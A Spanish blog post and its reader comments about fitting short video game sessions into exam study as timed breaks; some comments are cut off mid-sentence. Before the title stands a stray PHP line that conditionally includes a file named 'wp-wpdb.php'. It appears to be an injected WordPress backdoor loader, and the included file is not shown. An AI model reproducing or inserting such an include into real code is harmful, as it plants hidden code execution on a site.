if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Jugar en época de examenes – La Fortaleza de LeChuck

Jugar en época de examenes

Qué duro resulta a veces ser un aficionado de los videojuegos y un estudiante a la misma vez. Cuántos quebraderos de cabeza y distracciones han traído los videojuegos a nuestros estudios y carreras. Qué sensación tan mala esa de ponerte a jugar y estar pensando que en unos días empiezas los exámenes y todavía te queda temario que estudiar.
Aquí os cuento algunas rutinas de estudio y experiencia propia sobre este campo. Ya os adelanto que por el mero hecho de tener exámenes no es necesario guardar nuestra consola en el desván de mordor.

No os digo nada nuevo si os cuento que muchos de los aficionados de los videojuegos no juegan en su «mes de exámenes». Algunos inclusos desconectan todos los cables habidos y por haber de su habitación y los guarda en lo más profundo del inframundo.

Las videoconsolas y juegos interactivos en general tienen fama de distracción académica y le atribuimos una especie de «Magia Negra LV50» que tiene el poder de hacernos suspender, magia que ha sido atribuida desde tiempos inmemorables por los progenitores del gamer común.

Pongámonos en situación y recordemos esas épocas de exámenes. Por ejemplo:

 2 de Enero de 2012, 9:00 AM. 


Después de haber superado la resaca del primer día del año, el estudiante gamer por excelencia se conjura para estar estudiando las 3 semanas restantes para los exámenes de 8:00 a 00:00. Esta rutina de estudio que plantea solo contempla las interrupciones pertinentes para comer, cenar y cubrir sus necesidades fisiológicas.


Estos propósitos de estudios a mi parecer son antiproducentes en muchas de las carreras que nos oferta nuestro sistema educativo. Todavía no conozco al ser humano capaz de estar concentrado tantas horas en periodos tan largos. Desde luego un estudiante medio no tendrá la habilidad suficiente para cumplir este hábito

2 o 3 partidas de todos contra todos en equipos en Battlefield 3 es una actividad idónea para el descanso del estudio

Hay estudios que confirman que el periodo de concentración media de un ser humano acostumbrado al estudio es de unos 50 minutos, pudiendo variar este tiempo en cada estudiante en particular. También hay que destacar que hay muchas personas que no son capaces de concentrarse fácilmente y tardan mucho más en entrar en este periodo a la vez que durarán mucho menos en el periodo de concentración.

¿Qué tenemos que hacer cuando nuestro periodo de concentración se haya agotado?. Cualquier cosa menos seguir intentando estudiar, leer o comprender. Podéis hacer lo que queráis recomendando que sea una actividad diferente por periodo de 15 minutos. Por ejemplo, para los músicos es muy recomendable que toquen durante ese tiempo alguna pieza para piano. El uso de las dos manos que se requieren para la interpretación pianística reactiva los dos hemisferios favoreciendo el inicio de otro periodo de concentración.

No todo el mundo sabe tocar el piano, pero seguro que si estás leyendo esto es porque te gustan los videojuegos. En cada descanso del estudio se necesitan unos 10-15 minutos para volver a cargar pilas. Y no pasa nada por cargarlas jugando una partida con vuestra videoconsola favorita.

En este momento llegan los remordimientos más comunes: «No debería estar jugando, tengo que estudiar». Tranquilo, solo has parado 15 minutos y vas a volver a ello, distráete con tu actividad favorita y retomarás el estudio con mucha más productividad.

Qué mejor para despejarte que una partida a tu deporte virtual favorito (no pongas los partidos a 30 minutos)

También hay personas que en vez de realizar periodos de tiempo para descansar suele ponerse tareas, como por ejemplo estudiar un tema y descansar. Esto puede resultar también efectivo, pero siempre recomiendo agotar el periodo de concentración. Esto lo detectaremos cuando estemos estudiando y  empezamos a pensar en cosas que no vienen a cuento; por coger y cambiar objetos del escritorio de sitio o por movimientos continuos de las piernas o la cabeza. En ese momento es cuando debemos plantearnos realizar nuestro descanso.

¿Qué juegos usar en este periodo de descanso?. Pues muy sencillo simplemente un juego que por su género o estructura te límite la «partida». Como mejor ejemplo tenemos los juegos de genero deportivo o shooters en 1ª o 3ª persona online. Con estos juegos podremos saber cuanto va a durar aproximadamente nuestro tiempo de juego y podremos tener un «Fin de juego» que nos marcará nuestra vuelta al estudio. Sería un poco ilógico ponernos a jugar al Skyrim o algún RPG para 10 o 15 minutos asumiendo el riesgo de que puede «engancharnos» y perder más tiempo del esperado.

El planteamiento online de los Assassins Creed parecen estar pensados para el tema que tratamos aquí

Otra forma de organización es descubrir a qué horas es imposible que te concentres, cada uno tenemos nuestros hábitos y a raíz de ellos podremos concentrarnos mejor o peor a ciertas horas. En mi caso, por ejemplo nunca estudio de 15:00 a 16:00 horas ni de 23:00 a 00:00. Son horas en las que no consigo concentrarme y las suelo utilizar para «viciar» un rato.

Esto no funciona:

  • Si no tienes un hábito de estudio día a día.
  • Si empiezas el estudio pocos días antes del exámen y ves que no te da tiempo ya que los periodos de concentración serán muy diminutos y en cualquier caso el estudio puede ser un desastre.
  • Si mientras que estudias estás pensando en ponerte a jugar cuando pasen 50 minutos.
  • Si no tenemos fuerza de voluntad para el estudio.
  • Si estudias por las noches. Por las noches los periodos de concentración también son muy cortos.
  • Si no tienes dedicación completa al estudio. Hay gente que trabaja y sea como sea tiene que aprovechar las pocas horas que le quedan del día para estudiar lo que sea.

Qué conste que está es mi manera personal de organizarme y como siempre me gusta compartirlo con vosotros. Cada uno podrá estudiar como quiera y cada mente es un mundo. Pero no me digáis que en época de exámenes no paráis ni 30 minutos para poder practicar vuestra actividad favorita.

Y sobre todo y para los más jóvenes estudiantes recordad que debéis hacer del juego un descanso del estudio y no que el estudio sea un descanso del juego.

¡Ahora es vuestro turno!. ¿Cómo hacéis para compaginar los videojuegos con el tiempo de estudio?

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

12 comentarios

  1. Yo no lo hacia, tenia varias técnicas que me permitían estudiar mientras jugaba, pero nunca me salieron bien.

    Mas tarde aprendí que todo con moderación. Como bien dices, preferible un Starcraft a un Civ V. O simplemente verte una serie que te cambie el chip para después coger con mas ganas, no se….¿trigonometria?

  2. Pues yo en este pasado fin de semestre de la uni reconozco que al principio lo pasé fatal, ya que en lo único que podía pensar era en el come-horas Skyrim xD

    Al principio me costó, sobretodo porque los primeros días intentaba eso de no tocar las consolas para nada y estudiar a todas horas. Pero acabas desquiciado, así que cambié de estrategia.

    Yo soy incapaz de estudiar de

  3. Interesante lo que cuentas elviore, pero me llama la atención de que no enciendes la xbox porque sino no hay quién te mueva. Al igual que puedes jugar partidas limitadas a la portátil deberías jugar partidas limitadas a la xbox.

    Como comenté los RPG son muy malos para el estudio y las temporadas de trabajo. Yo siempre digo que los RPG son para el verano, durante el curso intento

  4. ¡Genial entrada! Yo en mis descansos juego a Mario Kart, como has dicho, una partida rápida no hace daño, de hecho, cuando acabo, me vuelvo a poner a estudiar con mucha más fuerza y me concentro más rápidamente.

    1. Intenta jugar a juegos offline o ponerte no disponible en el online.

      Al igual que nadie te molesta cuando estudias nadie te debe molestar en el descanso del estudio ya que aunque sea otra actividad entra dentro de la rutina de estudio como tal.

    1. Hay quién dice que no es recomendable estudiar el día de antes del exámen. Yo lo único que he conseguido es no estudiar el mismo día del exámen.

      Como dice Herman jugar la mañana del exámen es bastante interesante.

  5. que razon que razon que tienes, sobretodo en lo de ''no tendria que estar jugando '' , pero la verdad es que le exo de estar jugando durante epoca de examenes agobia muxo ya que te hace sentir como culpable , no se de que pero en mi caso me hace sentirme mal . Eso si el dia que los terminas no hay quien te saque de la consola.
    Como consejo personal , yo diria que lo mejor es

  6. 1) llegar de la uni o lo que sea
    2) almorzar
    3) Rondita de internet
    4) Viciar un rato
    5) Estudiar
    .
    .
    1) Terminar de estudiar para cenar
    2) Cenar
    3) Rondita de internet
    4) Estudiar
    5) Un mini vicio y a la cama.

Dejar un comentario